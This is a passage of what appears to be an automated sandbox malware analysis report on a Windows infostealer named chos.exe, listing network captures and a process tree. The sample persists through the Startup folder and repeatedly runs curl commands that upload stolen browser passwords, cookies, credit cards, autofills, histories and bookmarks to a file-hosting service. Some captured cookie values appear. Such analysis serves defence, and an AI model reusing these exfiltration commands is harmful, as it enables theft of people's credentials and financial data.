{"data":{"createTime":1734075908,"downloadPage":"https://gofile.io/d/bFBKX1","guestToken":"zTtV6xDjWqT5VMH7eEjsLv99ywkVpEUa","id":"aa5e2448-8030-4c63-be4c-5ef52a7752ca","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1734075908,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49746	31.14.70.245	443	9712	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:45:24 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 193 Content-Type: multipart/form-data; boundary=------------------------628f94e13f98c3ca
2024-12-13 07:45:24 UTC	193	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 32 38 66 39 34 65 31 33 66 39 38 63 33 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 70 61 73 73 77 6f 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 32 38 66 39 34 65 31 33 66 39 38 63 33 63 61 2d 2d 0d 0a Data Ascii: --------------------------628f94e13f98c3caContent-Disposition: form-data; name="file"; filename="crpasswords.txt"Content-Type: text/plain--------------------------628f94e13f98c3ca--
2024-12-13 07:45:25 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Fri, 13 Dec 2024 07:45:25 GMT Content-Type: application/json Content-Length: 893 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-13 07:45:25 UTC	893	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 32 35 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 6b 33 50 46 63 6e 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 61 6a 79 7a 4b 78 51 31 53 68 4d 4b 49 4f 38 57 71 72 4a 31 4e 38 6a 34 77 55 33 6e 54 4a 38 68 22 2c 22 69 64 22 3a 22 64 39 66 65 39 37 61 31 2d 30 61 30 66 2d 34 37 63 62 2d 62 31 39 39 2d 35 62 61 37 65 65 62 30 61 35 66 32 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 32 35 2c Data Ascii: {"data":{"createTime":1734075925,"downloadPage":"https://gofile.io/d/k3PFcn","guestToken":"ajyzKxQ1ShMKIO8WqrJ1N8j4wU3nTJ8h","id":"d9fe97a1-0a0f-47cb-b199-5ba7eeb0a5f2","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1734075925,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49753	31.14.70.245	443	5848	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:45:27 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 466 Content-Type: multipart/form-data; boundary=------------------------0a3e29c46757ee98
2024-12-13 07:45:27 UTC	466	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 61 33 65 32 39 63 34 36 37 35 37 65 65 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 35 2d 30 38 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 46 41 4c 53 45 09 32 35 39 37 35 37 33 34 35 36 09 4e 49 44 09 35 31 31 3d 6f 72 63 53 49 6e 6f 5a 42 62 Data Ascii: --------------------------0a3e29c46757ee98Content-Disposition: form-data; name="file"; filename="crcookies.txt"Content-Type: text/plain.google.comTRUE/FALSE25975734561P_JAR2023-10-05-08.google.comTRUE/FALSE2597573456NID511=orcSInoZBb
2024-12-13 07:45:27 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Fri, 13 Dec 2024 07:45:27 GMT Content-Type: application/json Content-Length: 437 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-13 07:45:27 UTC	437	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 32 37 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 57 68 79 30 49 70 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 67 5a 66 50 56 4b 63 7a 6c 49 45 39 31 67 57 32 37 6c 73 70 33 31 6c 53 6e 35 71 37 76 57 38 46 22 2c 22 69 64 22 3a 22 38 31 31 38 66 64 65 64 2d 62 37 38 38 2d 34 30 34 36 2d 61 64 61 38 2d 33 39 39 38 38 63 62 34 64 36 33 66 22 2c 22 6d 64 35 22 3a 22 61 62 37 62 33 31 34 39 37 61 38 39 63 65 65 35 38 66 66 37 66 34 32 30 31 32 66 35 61 30 36 32 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 74 61 62 2d 73 65 70 61 72 61 74 65 64 2d 76 61 6c 75 65 73 22 2c 22 6d 6f 64 54 69 Data Ascii: {"data":{"createTime":1734075927,"downloadPage":"https://gofile.io/d/Why0Ip","guestToken":"gZfPVKczlIE91gW27lsp31lSn5q7vW8F","id":"8118fded-b788-4046-ada8-39988cb4d63f","md5":"ab7b31497a89cee58ff7f42012f5a062","mimetype":"text/tab-separated-values","modTi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49760	31.14.70.245	443	2848	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:45:29 UTC	198	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io User-Agent: curl/7.83.1 Accept: / Content-Length: 195 Content-Type: multipart/form-data; boundary=------------------------55476ce27bcc9803
2024-12-13 07:45:29 UTC	195	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 35 34 37 36 63 65 32 37 62 63 63 39 38 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 72 65 64 69 74 63 61 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 35 34 37 36 63 65 32 37 62 63 63 39 38 30 33 2d 2d 0d 0a Data Ascii: --------------------------55476ce27bcc9803Content-Disposition: form-data; name="file"; filename="crcreditcards.txt"Content-Type: text/plain--------------------------55476ce27bcc9803--
2024-12-13 07:45:30 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Fri, 13 Dec 2024 07:45:30 GMT Content-Type: application/json Content-Length: 895 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-13 07:45:30 UTC	895	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 33 30 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 50 6c 4c 75 78 39 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 43 41 72 47 49 56 4c 4c 76 38 73 62 36 38 72 68 4b 41 35 73 32 63 52 55 56 79 5a 50 6c 67 59 5a 22 2c 22 69 64 22 3a 22 65 64 36 32 30 62 33 39 2d 30 65 61 64 2d 34 35 61 38 2d 61 33 35 38 2d 62 37 65 37 37 66 36 30 64 33 30 35 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 34 30 37 35 39 33 30 2c Data Ascii: {"data":{"createTime":1734075930,"downloadPage":"https://gofile.io/d/PlLux9","guestToken":"CArGIVLLv8sb68rhKA5s2cRUVyZPlgYZ","id":"ed620b39-0ead-45a8-a358-b7e77f60d305","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1734075930,

Target ID:	0
Start time:	02:44:41
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\chos.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\chos.exe"
Imagebase:	0x7ff666dd0000
File size:	17'703'403 bytes
MD5 hash:	C93BC8DCDB9B8C4B49B429B64C182B92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:44:44
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\chos.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\chos.exe"
Imagebase:	0x7ff666dd0000
File size:	17'703'403 bytes
MD5 hash:	C93BC8DCDB9B8C4B49B429B64C182B92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:44:53
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:44:53
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:44:53
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x7ff76a3f0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:44:59
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:44:59
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:44:59
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:45:02
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe"
Imagebase:	0x7ff7fd730000
File size:	17'703'403 bytes
MD5 hash:	C93BC8DCDB9B8C4B49B429B64C182B92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:45:02
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:45:02
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:45:02
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:45:04
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:45:04
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:45:04
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:45:06
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe"
Imagebase:	0x7ff7fd730000
File size:	17'703'403 bytes
MD5 hash:	C93BC8DCDB9B8C4B49B429B64C182B92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:45:07
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:45:07
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:45:07
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:45:07
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:45:07
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:45:07
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:45:08
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:45:08
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:45:08
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:45:16
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5400, Parent PID: 7224

General

Target ID:	28
Start time:	02:45:16
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:45:16
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x7ff76a3f0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	02:45:22
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2940, Parent PID: 6468

General

Target ID:	31
Start time:	02:45:22
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:45:22
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:45:24
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3984, Parent PID: 2352

General

Target ID:	34
Start time:	02:45:24
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	02:45:24
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	02:45:26
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	02:45:26
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5560, Parent PID: 7356

General

Target ID:	39
Start time:	02:45:26
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	02:45:26
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
